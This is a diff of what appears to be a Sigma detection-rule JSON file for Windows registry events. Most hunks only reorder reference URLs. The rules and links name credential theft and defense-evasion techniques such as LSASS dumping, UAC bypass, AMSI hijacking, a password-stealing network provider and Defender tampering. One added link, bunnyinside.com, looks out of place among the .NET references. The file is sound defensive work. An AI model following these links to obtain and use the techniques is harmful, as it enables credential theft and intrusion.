+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_wow6432node.yml"
 ],
 "tags": [
@@ -16262,8 +16286,8 @@
 "logsource.category": "registry_set",
 "logsource.product": "windows",
 "refs": [
- "https://threathunterplaybook.com/notebooks/windows/02_execution/WIN-190511223310.html",
 "https://support.microsoft.com/en-us/topic/microsoft-security-advisory-update-to-improve-credentials-protection-and-management-may-13-2014-93434251-04ac-b7f3-52aa-9f951c14b649",
+ "https://threathunterplaybook.com/notebooks/windows/02_execution/WIN-190511223310.html",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_wdigest_enable_uselogoncredential.yml"
 ],
 "tags": [
@@ -16287,8 +16311,8 @@
 "logsource.category": "registry_set",
 "logsource.product": "windows",
 "refs": [
- "https://twitter.com/dottor_morte/status/1544652325570191361",
 "https://raw.githubusercontent.com/RiccardoAncarani/talks/master/F-Secure/unorthodox-lateral-movement.pdf",
+ "https://twitter.com/dottor_morte/status/1544652325570191361",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_fax_dll_persistance.yml"
 ],
 "tags": [
@@ -16370,9 +16394,9 @@
 "logsource.category": "registry_set",
 "logsource.product": "windows",
 "refs": [
+ "https://github.com/gtworek/PSBits/tree/master/SIP",
 "https://persistence-info.github.io/Data/codesigning.html",
 "https://specterops.io/assets/resources/SpecterOps_Subverting_Trust_in_Windows.pdf",
- "https://github.com/gtworek/PSBits/tree/master/SIP",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_sip_persistence.yml"
 ],
 "tags": [
@@ -16407,9 +16431,9 @@
 "logsource.category": "registry_set",
 "logsource.product": "windows",
 "refs": [
+ "https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns",
 "https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d",
 "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md",
- "https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_classes.yml"
 ],
 "tags": [
@@ -16490,8 +16514,8 @@
 "logsource.category": "registry_set",
 "logsource.product": "windows",
 "refs": [
- "https://www.hexacorn.com/blog/2013/09/19/beyond-good-ol-run-key-part-4/",
 "https://github.com/last-byte/PersistenceSniper",
+ "https://www.hexacorn.com/blog/2013/09/19/beyond-good-ol-run-key-part-4/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_dbgmanageddebugger_persistence.yml"
 ],
 "tags": [
@@ -16581,8 +16605,8 @@
 "logsource.category": "registry_set",
 "logsource.product": "windows",
 "refs": [
- "https://www.youtube.com/watch?v=3gz1QmiMhss&t=1251s",
 "https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1546.015/T1546.015.md",
+ "https://www.youtube.com/watch?v=3gz1QmiMhss&t=1251s",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_treatas_persistence.yml"
 ],
 "tags": [
@@ -16638,8 +16662,8 @@
 "logsource.category": "registry_set",
 "logsource.product": "windows",
 "refs": [
- "https://twitter.com/WhichbufferArda/status/1543900539280293889",
 "https://github.com/DebugPrivilege/CPP/blob/c39d365617dbfbcb01fffad200d52b6239b2918c/Windows%20Defender/RestoreDefenderConfig.cpp",
+ "https://twitter.com/WhichbufferArda/status/1543900539280293889",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_disable_winevt_logging.yml"
 ],
 "tags": [
@@ -16706,8 +16730,8 @@
 "logsource.category": "registry_set",
 "logsource.product": "windows",
 "refs": [
- "https://labs.f-secure.com/blog/scheduled-task-tampering/",
 "https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/",
+ "https://labs.f-secure.com/blog/scheduled-task-tampering/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_taskcache_entry.yml"
 ],
 "tags": [
@@ -16827,8 +16851,8 @@
 "logsource.category": "registry_set",
 "logsource.product": "windows",
 "refs": [
- "https://persistence-info.github.io/Data/diskcleanuphandler.html",
 "https://www.hexacorn.com/blog/2018/09/02/beyond-good-ol-run-key-part-86/",
+ "https://persistence-info.github.io/Data/diskcleanuphandler.html",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_disk_cleanup_handler_autorun_persistence.yml"
 ],
 "tags": [
@@ -17048,10 +17072,10 @@
 "logsource.category": "registry_set",
 "logsource.product": "windows",
 "refs": [
- "https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d",
- "https://persistence-info.github.io/Data/userinitmprlogonscript.html",
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md",
 "https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns",
+ "https://persistence-info.github.io/Data/userinitmprlogonscript.html",
+ "https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d",
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_common.yml"
 ],
 "tags": [
@@ -17166,13 +17190,13 @@
 "logsource.category": "registry_set",
 "logsource.product": "windows",
 "refs": [
- "http://woshub.com/rds-shadow-how-to-connect-to-a-user-session-in-windows-server-2012-r2/",
- "https://admx.help/HKLM/SOFTWARE/Policies/Microsoft/Windows%20NT/Terminal%20Services",
- "https://bazaar.abuse.ch/sample/6f3aa9362d72e806490a8abce245331030d1ab5ac77e400dd475748236a6cc81/",
- "https://blog.menasec.net/2019/02/threat-hunting-rdp-hijacking-via.html",
- "http://etutorials.org/Microsoft+Products/microsoft+windows+server+2003+terminal+services/Chapter+6+Registry/Registry+Keys+for+Terminal+Services/",
 "https://twitter.com/SagieSec/status/1469001618863624194?t=HRf0eA0W1YYzkTSHb-Ky1A&s=03",
 "https://threathunterplaybook.com/notebooks/windows/05_defense_evasion/WIN-190407183310.html",
+ "http://woshub.com/rds-shadow-how-to-connect-to-a-user-session-in-windows-server-2012-r2/",
+ "https://blog.menasec.net/2019/02/threat-hunting-rdp-hijacking-via.html",
+ "https://bazaar.abuse.ch/sample/6f3aa9362d72e806490a8abce245331030d1ab5ac77e400dd475748236a6cc81/",
+ "https://admx.help/HKLM/SOFTWARE/Policies/Microsoft/Windows%20NT/Terminal%20Services",
+ "http://etutorials.org/Microsoft+Products/microsoft+windows+server+2003+terminal+services/Chapter+6+Registry/Registry+Keys+for+Terminal+Services/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_terminal_server_tampering.yml"
 ],
 "tags": [
@@ -17231,9 +17255,9 @@
 "logsource.category": "registry_set",
 "logsource.product": "windows",
 "refs": [
+ "https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns",
 "https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d",
 "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md",
- "https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_office.yml"
 ],
 "tags": [
@@ -17258,9 +17282,9 @@
 "logsource.category": "registry_set",
 "logsource.product": "windows",
 "refs": [
+ "https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns",
 "https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d",
 "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md",
- "https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_wow6432node_classes.yml"
 ],
 "tags": [
@@ -17308,8 +17332,8 @@
 "logsource.category": "registry_set",
 "logsource.product": "windows",
 "refs": [
- "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-30190",
 "https://msrc-blog.microsoft.com/2022/05/30/guidance-for-cve-2022-30190-microsoft-support-diagnostic-tool-vulnerability/",
+ "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-30190",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_cve_2022_30190_msdt_follina.yml"
 ],
 "tags": [
@@ -17443,8 +17467,8 @@
 "logsource.category": "registry_set",
 "logsource.product": "windows",
 "refs": [
- "https://www.virustotal.com/gui/file/2bcd5702a7565952c44075ac6fb946c7780526640d1264f692c7664c02c68465",
 "https://support.microsoft.com/en-us/topic/information-about-the-attachment-manager-in-microsoft-windows-c48a4dcd-8de5-2af5-ee9b-cd795ae42738",
+ "https://www.virustotal.com/gui/file/2bcd5702a7565952c44075ac6fb946c7780526640d1264f692c7664c02c68465",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_policies_attachments_tamper.yml"
 ],
 "tags": [
@@ -17491,9 +17515,9 @@
 "logsource.category": "registry_set",
 "logsource.product": "windows",
 "refs": [
- "https://itconnect.uw.edu/tools-services-support/it-systems-infrastructure/msinf/other-help/understanding-sddl-syntax/",
- "https://app.any.run/tasks/77b2e328-8f36-46b2-b2e2-8a80398217ab/",
 "https://learn.microsoft.com/en-us/windows/win32/api/winevt/",
+ "https://app.any.run/tasks/77b2e328-8f36-46b2-b2e2-8a80398217ab/",
+ "https://itconnect.uw.edu/tools-services-support/it-systems-infrastructure/msinf/other-help/understanding-sddl-syntax/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_change_winevt_channelaccess.yml"
 ],
 "tags": [
@@ -17527,9 +17551,9 @@
 "logsource.category": "registry_set",
 "logsource.product": "windows",
 "refs": [
+ "https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns",
 "https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d",
 "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md",
- "https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_winsock2.yml"
 ],
 "tags": [
@@ -17758,9 +17782,9 @@
 "logsource.category": "registry_set",
 "logsource.product": "windows",
 "refs": [
+ "https://thedfirreport.com/2021/10/18/icedid-to-xinglocker-ransomware-in-24-hours/",
 "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ransomware-hive-conti-avoslocker",
 "https://admx.help/?Category=Windows_7_2008R2&Policy=Microsoft.Policies.WindowsDefender::SpyNetReporting",
- "https://thedfirreport.com/2021/10/18/icedid-to-xinglocker-ransomware-in-24-hours/",
 "https://gist.github.com/anadr/7465a9fde63d41341136949f14c21105",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_windows_defender_tamper.yml"
 ],
@@ -17785,8 +17809,8 @@
 "logsource.category": "registry_set",
 "logsource.product": "windows",
 "refs": [
- "https://posts.specterops.io/code-signing-certificate-cloning-attacks-and-defenses-6f98657fc6ec",
 "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1553.004/T1553.004.md#atomic-test-6---add-root-certificate-to-currentuser-certificate-store",
+ "https://posts.specterops.io/code-signing-certificate-cloning-attacks-and-defenses-6f98657fc6ec",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_install_root_or_ca_certificat.yml"
 ],
 "tags": [
@@ -17819,8 +17843,8 @@
 "logsource.category": "registry_set",
 "logsource.product": "windows",
 "refs": [
- "https://github.com/hfiref0x/UACME",
 "https://enigma0x3.net/2017/03/17/fileless-uac-bypass-using-sdclt-exe/",
+ "https://github.com/hfiref0x/UACME",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_uac_bypass_sdclt.yml"
 ],
 "tags": [
@@ -17855,8 +17879,8 @@
 "logsource.category": "registry_set",
 "logsource.product": "windows",
 "refs": [
- "https://persistence-info.github.io/Data/hhctrl.html",
 "https://www.hexacorn.com/blog/2018/04/23/beyond-good-ol-run-key-part-77/",
+ "https://persistence-info.github.io/Data/hhctrl.html",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_hhctrl_persistence.yml"
 ],
 "tags": [
@@ -18075,8 +18099,8 @@
 "logsource.category": "registry_set",
 "logsource.product": "windows",
 "refs": [
- "https://docs.microsoft.com/en-us/troubleshoot/developer/browsers/security-privacy/ie-security-zones-registry-entries",
 "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1112/T1112.md#atomic-test-4---add-domain-to-trusted-sites-zone",
+ "https://docs.microsoft.com/en-us/troubleshoot/developer/browsers/security-privacy/ie-security-zones-registry-entries",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_change_security_zones.yml"
 ],
 "tags": [
@@ -18203,9 +18227,9 @@
 "logsource.category": "registry_set",
 "logsource.product": "windows",
 "refs": [
+ "https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns",
 "https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d",
 "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md",
- "https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_wow6432node_currentversion.yml"
 ],
 "tags": [
@@ -18254,9 +18278,9 @@
 "logsource.category": "registry_set",
 "logsource.product": "windows",
 "refs": [
+ "https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns",
 "https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d",
 "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md",
- "https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_currentcontrolset.yml"
 ],
 "tags": [
@@ -18313,8 +18337,8 @@
 "logsource.category": "registry_set",
 "logsource.product": "windows",
 "refs": [
- "https://persistence-info.github.io/Data/aedebug.html",
 "https://docs.microsoft.com/en-us/windows/win32/debug/configuring-automatic-debugging",
+ "https://persistence-info.github.io/Data/aedebug.html",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_aedebug_persistence.yml"
 ],
 "tags": [
@@ -18362,9 +18386,9 @@
 "logsource.category": "registry_set",
 "logsource.product": "windows",
 "refs": [
+ "https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns",
 "https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d",
 "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md",
- "https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_system_scripts.yml"
 ],
 "tags": [
@@ -18388,9 +18412,9 @@
 "logsource.category": "registry_set",
 "logsource.product": "windows",
 "refs": [
+ "https://github.com/deepinstinct/Lsass-Shtinkering",
 "https://media.defcon.org/DEF%20CON%2030/DEF%20CON%2030%20presentations/Asaf%20Gilboa%20-%20LSASS%20Shtinkering%20Abusing%20Windows%20Error%20Reporting%20to%20Dump%20LSASS.pdf",
 "https://learn.microsoft.com/en-us/windows/win32/wer/collecting-user-mode-dumps",
- "https://github.com/deepinstinct/Lsass-Shtinkering",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_lsass_usermode_dumping.yml"
 ],
 "tags": [
@@ -18424,8 +18448,8 @@
 "logsource.product": "windows",
 "refs": [
 "https://blog.3or.de/mimilib-dhcp-server-callout-dll-injection.html",
- "https://technet.microsoft.com/en-us/library/cc726884(v=ws.10).aspx",
 "https://msdn.microsoft.com/de-de/library/windows/desktop/aa363389(v=vs.85).aspx",
+ "https://technet.microsoft.com/en-us/library/cc726884(v=ws.10).aspx",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_dhcp_calloutdll.yml"
 ],
 "tags": [
@@ -18483,8 +18507,8 @@
 "logsource.category": "registry_set",
 "logsource.product": "windows",
 "refs": [
- "https://devblogs.microsoft.com/oldnewthing/20100312-01/?p=14623",
 "https://docs.microsoft.com/en-us/windows/win32/api/shobjidl_core/nn-shobjidl_core-iexecutecommand",
+ "https://devblogs.microsoft.com/oldnewthing/20100312-01/?p=14623",
 "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1548.002/T1548.002.md#atomic-test-7---bypass-uac-using-sdclt-delegateexecute",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_bypass_uac_using_delegateexecute.yml"
 ],
@@ -18575,9 +18599,9 @@
 "logsource.category": "registry_set",
 "logsource.product": "windows",
 "refs": [
- "https://www.slideshare.net/JamieWilliams130/started-from-the-bottom-exploiting-data-sources-to-uncover-attck-behaviors",
- "https://www.sans.org/cyber-security-summit/archives",
 "https://twitter.com/jamieantisocial/status/1304520651248668673",
+ "https://www.sans.org/cyber-security-summit/archives",
+ "https://www.slideshare.net/JamieWilliams130/started-from-the-bottom-exploiting-data-sources-to-uncover-attck-behaviors",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_enabling_cor_profiler_env_variables.yml"
 ],
 "tags": [
@@ -18728,8 +18752,8 @@
 "logsource.category": "registry_set",
 "logsource.product": "windows",
 "refs": [
- "https://twitter.com/dottor_morte/status/1544652325570191361",
 "https://raw.githubusercontent.com/RiccardoAncarani/talks/master/F-Secure/unorthodox-lateral-movement.pdf",
+ "https://twitter.com/dottor_morte/status/1544652325570191361",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_fax_change_service_user.yml"
 ],
 "tags": [
@@ -19098,10 +19122,10 @@
 "logsource.category": "registry_set",
 "logsource.product": "windows",
 "refs": [
- "https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d",
- "https://oddvar.moe/2018/03/21/persistence-using-runonceex-hidden-from-autoruns-exe/",
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md",
 "https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns",
+ "https://oddvar.moe/2018/03/21/persistence-using-runonceex-hidden-from-autoruns-exe/",
+ "https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d",
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_currentversion.yml"
 ],
 "tags": [
@@ -19158,8 +19182,8 @@
 "logsource.category": "registry_set",
 "logsource.product": "windows",
 "refs": [
- "https://unit42.paloaltonetworks.com/ransomware-families/",
 "https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?name=TrojanSpy%3aMSIL%2fHakey.A",
+ "https://unit42.paloaltonetworks.com/ransomware-families/",
 "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1112/T1112.md#atomic-test-1---modify-registry-of-current-user-profile---cmd",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_hidden_extention.yml"
 ],
@@ -19191,8 +19215,8 @@
 "logsource.category": "registry_set",
 "logsource.product": "windows",
 "refs": [
- "https://www.hybrid-analysis.com/sample/ba86fa0d4b6af2db0656a88b1dd29f36fe362473ae8ad04255c4e52f214a541c?environmentId=100",
 "https://www.first.org/resources/papers/conf2017/Advanced-Incident-Detection-and-Threat-Hunting-using-Sysmon-and-Splunk.pdf",
+ "https://www.hybrid-analysis.com/sample/ba86fa0d4b6af2db0656a88b1dd29f36fe362473ae8ad04255c4e52f214a541c?environmentId=100",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_mal_adwind.yml"
 ],
 "tags": [
@@ -19233,8 +19257,8 @@
 "logsource.category": "registry_set",
 "logsource.product": "windows",
 "refs": [
- "https://www.reddit.com/r/hacking/comments/ajtrws/bypassing_highest_uac_level_windows_810/",
 "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1548.002/T1548.002.md#atomic-test-9---bypass-uac-using-silentcleanup-task",
+ "https://www.reddit.com/r/hacking/comments/ajtrws/bypassing_highest_uac_level_windows_810/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_bypass_uac_using_silentcleanup_task.yml"
 ],
 "tags": [
@@ -19268,9 +19292,9 @@
 "logsource.category": "registry_set",
 "logsource.product": "windows",
 "refs": [
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md",
 "https://unit42.paloaltonetworks.com/unit42-gorgon-group-slithering-nation-state-cybercrime/",
 "https://yoroi.company/research/cyber-criminal-espionage-operation-insists-on-italian-manufacturing/",
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_disable_microsoft_office_security_features.yml"
 ],
 "tags": [
@@ -19343,10 +19367,10 @@
 "logsource.category": "registry_set",
 "logsource.product": "windows",
 "refs": [
- "https://www.tenforums.com/tutorials/151318-how-enable-disable-dns-over-https-doh-microsoft-edge.html",
- "https://admx.help/HKLM/Software/Policies/Mozilla/Firefox/DNSOverHTTPS",
- "https://chromeenterprise.google/policies/?policy=DnsOverHttpsMode",
 "https://github.com/elastic/detection-rules/issues/1371",
+ "https://chromeenterprise.google/policies/?policy=DnsOverHttpsMode",
+ "https://admx.help/HKLM/Software/Policies/Mozilla/Firefox/DNSOverHTTPS",
+ "https://www.tenforums.com/tutorials/151318-how-enable-disable-dns-over-https-doh-microsoft-edge.html",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_dns_over_https_enabled.yml"
 ],
 "tags": [
@@ -19438,8 +19462,8 @@
 "logsource.product": "windows",
 "refs": [
 "https://twitter.com/MichalKoczwara/status/1553634816016498688",
- "https://i.blackhat.com/EU-21/Wednesday/EU-21-Teodorescu-Veni-No-Vidi-No-Vici-Attacks-On-ETW-Blind-EDRs.pdf",
 "https://thedfirreport.com/2021/10/18/icedid-to-xinglocker-ransomware-in-24-hours/",
+ "https://i.blackhat.com/EU-21/Wednesday/EU-21-Teodorescu-Veni-No-Vidi-No-Vici-Attacks-On-ETW-Blind-EDRs.pdf",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_disable_autologger_sessions.yml"
 ],
 "tags": [
@@ -19463,16 +19487,16 @@
 "logsource.product": "windows",
 "refs": [
 "https://github.com/dotnet/runtime/blob/f62e93416a1799aecc6b0947adad55a0d9870732/src/coreclr/src/inc/clrconfigvalues.h#L35-L38",
- "https://i.blackhat.com/EU-21/Wednesday/EU-21-Teodorescu-Veni-No-Vidi-No-Vici-Attacks-On-ETW-Blind-EDRs.pdf",
- "https://github.com/dotnet/runtime/blob/7abe42dc1123722ed385218268bb9fe04556e3d3/src/coreclr/src/inc/clrconfig.h#L33-L39",
- "https://twitter.com/_xpn_/status/1268712093928378368",
 "https://blog.xpnsec.com/hiding-your-dotnet-complus-etwenabled/",
- "https://github.com/dotnet/runtime/blob/4f9ae42d861fcb4be2fcd5d3d55d5f227d30e723/docs/coding-guidelines/clr-jit-coding-conventions.md#1412-disabling-code",
- "https://social.msdn.microsoft.com/Forums/vstudio/en-US/0878832e-39d7-4eaf-8e16-a729c4c40975/what-can-i-use-e13c0d23ccbc4e12931bd9cc2eee27e4-for?forum=clr",
- "https://github.com/dotnet/runtime/search?p=1&q=COMPlus_&unscoped_q=COMPlus_",
+ "https://twitter.com/_xpn_/status/1268712093928378368",
 "http://managed670.rssing.com/chan-5590147/all_p1.html",
+ "https://github.com/dotnet/runtime/search?p=1&q=COMPlus_&unscoped_q=COMPlus_",
+ "https://i.blackhat.com/EU-21/Wednesday/EU-21-Teodorescu-Veni-No-Vidi-No-Vici-Attacks-On-ETW-Blind-EDRs.pdf",
 "https://github.com/dotnet/runtime/blob/ee2355c801d892f2894b0f7b14a20e6cc50e0e54/docs/design/coreclr/jit/viewing-jit-dumps.md#setting-configuration-variables",
+ "https://github.com/dotnet/runtime/blob/7abe42dc1123722ed385218268bb9fe04556e3d3/src/coreclr/src/inc/clrconfig.h#L33-L39",
+ "https://social.msdn.microsoft.com/Forums/vstudio/en-US/0878832e-39d7-4eaf-8e16-a729c4c40975/what-can-i-use-e13c0d23ccbc4e12931bd9cc2eee27e4-for?forum=clr",
 "https://bunnyinside.com/?term=f71e8cb9c76a",
+ "https://github.com/dotnet/runtime/blob/4f9ae42d861fcb4be2fcd5d3d55d5f227d30e723/docs/coding-guidelines/clr-jit-coding-conventions.md#1412-disabling-code",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_dot_net_etw_tamper.yml"
 ],
 "tags": [
@@ -19540,9 +19564,9 @@
 "logsource.category": "registry_set",
 "logsource.product": "windows",
 "refs": [
+ "https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns",
 "https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d",
 "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md",
- "https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_internet_explorer.yml"
 ],
 "tags": [
@@ -19566,8 +19590,8 @@
 "logsource.category": "registry_set",
 "logsource.product": "windows",
 "refs": [
- "https://github.com/gtworek/PSBits/tree/master/PasswordStealing/NPPSpy",
 "https://docs.microsoft.com/en-us/troubleshoot/windows-client/deployment/network-provider-settings-removed-in-place-upgrade",
+ "https://github.com/gtworek/PSBits/tree/master/PasswordStealing/NPPSpy",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_new_network_provider.yml"
 ],
 "tags": [
@@ -19601,8 +19625,8 @@
 "logsource.product": "windows",
 "refs": [
 "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1112/T1112.md",
- "https://blogs.vmware.com/security/2022/11/batloader-the-evasive-downloader-malware.html",
 "https://www.mandiant.com/resources/unc2165-shifts-to-evade-sanctions",
+ "https://blogs.vmware.com/security/2022/11/batloader-the-evasive-downloader-malware.html",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_disable_function_user.yml"
 ],
 "tags": [
@@ -19626,8 +19650,8 @@
 "logsource.category": "registry_set",
 "logsource.product": "windows",
 "refs": [
- "https://enigma0x3.net/2017/07/19/bypassing-amsi-via-com-server-hijacking/",
 "https://github.com/r00t-3xp10it/hacking-material-books/blob/43cb1e1932c16ff1f58b755bc9ab6b096046853f/obfuscation/simple_obfuscation.md#amsi-comreg-bypass",
+ "https://enigma0x3.net/2017/07/19/bypassing-amsi-via-com-server-hijacking/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_amsi_com_hijack.yml"
 ],
 "tags": [
@@ -19653,8 +19677,8 @@
 "refs": [
 "https://persistence-info.github.io/Data/ifilters.html",
 "https://github.com/gtworek/PSBits/tree/master/IFilter",
- "https://github.com/gtworek/PSBits/blob/8d767892f3b17eefa4d0668f5d2df78e844f01d8/IFilter/Dll.cpp#L281-L308",
 "https://twitter.com/0gtweet/status/1468548924600459267",
+ "https://github.com/gtworek/PSBits/blob/8d767892f3b17eefa4d0668f5d2df78e844f01d8/IFilter/Dll.cpp#L281-L308",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_persistence_ifilter.yml"
 ],
 "tags": [
@@ -19812,9 +19836,9 @@
 "logsource.category": "image_load",
 "logsource.product": "windows",
 "refs": [
